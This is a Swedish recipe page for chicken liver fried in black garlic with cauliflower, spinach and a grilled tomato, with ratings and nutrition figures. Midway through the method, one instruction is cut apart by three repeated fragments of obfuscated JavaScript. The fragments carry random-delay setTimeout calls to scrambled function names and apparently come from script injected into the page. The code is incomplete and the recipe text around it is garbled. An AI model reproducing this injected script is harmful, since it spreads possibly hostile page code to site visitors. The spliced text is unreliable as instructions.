Kycklinglever stekt i svartvitlök
2013-09-08- Servings : 1
- Prep Time : 5m
- Cook Time : 15m
- Ready In : 20m
Ni kan använda vanlig vitlök om ni vill
- 150g kycklinglever
- 100g riven blomkål
- 150g 1/2 bifftomat
- 40g hackad lök
- 50g spenat
- 1st svartvitlök
- 5g kokosfett
- Svartpeppar
- Örtsalt
Gör så här:
Sätt igång ugnen på 200C grill
Krydda tomaten med örtsalt och svartpeppar, placera den i ugnen i ca 15 minuter.
Stek lök och vitlök hårt i kokosfett i ca 3 minuter, tills det nästan är bränd lök. Tillsätt kycklinglever och blomkål, sänk värmen till medel, stek i ca 5 minuter, krydda med svartpeppar och örtsalt. Blandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}a i spenat till sist. Toppa med riven parmesan. Servera med tomaten.
Medlemsbetyg
(4.7 / 5)
3 people rated this recipe
Related Recipes:
Näringssinnehåll
Informationen gäller per portion
-
kCal
388,4 -
Protein
37,5 g -
Kolhydrater
13,8 g -
Fett
19,5 g